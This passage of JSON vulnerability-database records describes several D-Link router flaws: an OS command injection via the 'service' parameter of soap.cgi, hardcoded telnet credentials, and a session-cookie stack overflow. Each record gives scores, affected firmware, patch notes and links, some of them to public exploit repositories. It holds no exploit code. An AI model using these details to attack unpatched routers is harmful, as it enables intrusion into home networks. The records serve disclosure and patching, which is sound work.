"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-6530",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06671",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-136562",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-6530",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-6530",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-6530",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-6530",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-06671",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-149",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-136562",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-6530",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. plural D-Link The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-880L and others are all wireless router products of D-Link. An operating system command injection vulnerability exists in the soap.cgi file in several D-Link products. A remote attacker can exploit this vulnerability to execute arbitrary operating system commands with the help of the \\342\\200\\230service\\342\\200\\231 parameter. The following products and versions are affected: DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and earlier; DIR-868L DIR868LA1_FW112b04 and earlier; DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L and earlier DIR410b_ ",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-6530",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-06671",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-136562",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-6530",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"id": "VAR-201803-1769",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
}
],
"trust": 1.525419932
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
}
]
},
"last_update_date": "2024-11-23T22:22:11.452000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-860L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"title": "DIR-865L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"title": "DIR-868L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"title": "DIR-880L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
},
{
"title": "Patches for multiple D-Link product operating system command injection vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/124231"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto "
},
{
"title": "EQUAFL_setup\nUSAGE\nEQUAFL++\nAFLPlusplus\nServer\nCOMMAND INJECTION INFO\nroot cause analysis",
"trust": 0.1,
"url": "https://github.com/zyw-200/EQUAFL_setup "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/thebeeman/pwning-multiple-dlink-router-via-soap-proto"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-860l/reva/dir-860l_reva_firmware_patch_notes_1.11b01_en_ww.pdf"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-868l/reva/dir-868l_reva_firmware_patch_notes_1.20b01_en_ww.pdf"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-865l/reva/dir-865l_reva_firmware_patch_notes_1.10b01_en_ww.pdf"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-880l/reva/dir-880l_reva_firmware_patch_notes_1.08b06_en_ww.pdf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6530"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-6530"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/zyw-200/equafl_setup"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "VULHUB",
"id": "VHN-136562"
},
{
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULHUB",
"id": "VHN-136562"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"date": "2018-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"date": "2018-03-06T20:29:00.987000",
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"date": "2018-03-27T00:00:00",
"db": "VULHUB",
"id": "VHN-136562"
},
{
"date": "2023-11-08T00:00:00",
"db": "VULMON",
"id": "CVE-2018-6530"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"date": "2024-11-21T04:10:50.700000",
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link In product OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
}
],
"trust": 0.6
}
}
var-202106-0371
Vulnerability from variot
The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data. D-Link Router DIR-868L Exists in an inadequate protection of credentials.Information may be obtained. D-Link DIR-868L is a wireless AC1750 dual-band gigabit cloud router.
D-Link DIR-868L version 3.01 has a credential disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-0371",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "3.01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-868l firmware 3.01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "3.01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"cve": "CVE-2020-29321",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-29321",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-41077",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-29321",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-29321",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-29321",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-29321",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-41077",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-363",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data. D-Link Router DIR-868L Exists in an inadequate protection of credentials.Information may be obtained. D-Link DIR-868L is a wireless AC1750 dual-band gigabit cloud router. \n\r\n\r\nD-Link DIR-868L version 3.01 has a credential disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "CNVD",
"id": "CNVD-2021-41077"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-29321",
"trust": 3.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-41077",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"id": "VAR-202106-0371",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
}
]
},
"last_update_date": "2024-08-14T14:31:43.178000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.dlink.com.br/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.0
},
{
"problemtype": "CWE-798",
"trust": 1.0
},
{
"problemtype": "Inadequate protection of credentials (CWE-522) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29321"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"date": "2022-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"date": "2021-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"date": "2021-06-04T20:15:07.607000",
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"date": "2022-02-15T08:43:00",
"db": "JVNDB",
"id": "JVNDB-2020-016838"
},
{
"date": "2021-06-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-363"
},
{
"date": "2022-07-12T17:42:04.277000",
"db": "NVD",
"id": "CVE-2020-29321"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-868L Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41077"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-363"
}
],
"trust": 0.6
}
}
var-201608-0074
Vulnerability from variot
D-Link Multiple router products offered by have a stack-based buffer overflow vulnerability. Stack-based buffer overflow (CWE-121) - CVE-2016-5681 program cgibin There is a stack-based buffer overflow in the process of validating the session cookie contained in the function in. this function is, WAN Side interface 8181/tcp It is also used in the service that waits at. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlArbitrary code could be executed by processing a crafted request. D-LinkDIR-895L is a wireless router from D-Link. The following products and versions are affected: D-Link DIR-850L B1 Version 2.07 prior to 2.07WWB05, DIR-817 Ax, DIR-818LW Bx Version 2.05b03beta03 prior, DIR-822 C1 Version 3.01 prior to 3.01WWb02, DIR-823 A1 version 1.00 before 1.00WWb05, DIR-895L A1 version 1.11 before 1.11WWb04, DIR-890L A1 version 1.09 before 1.09b14, DIR-885L A1 version 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08 Version, version 2.03 before DIR-868L B1 2.03WWb01, version 3.00 before DIR-868L C1 3.00WWb01
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0074",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-895l",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
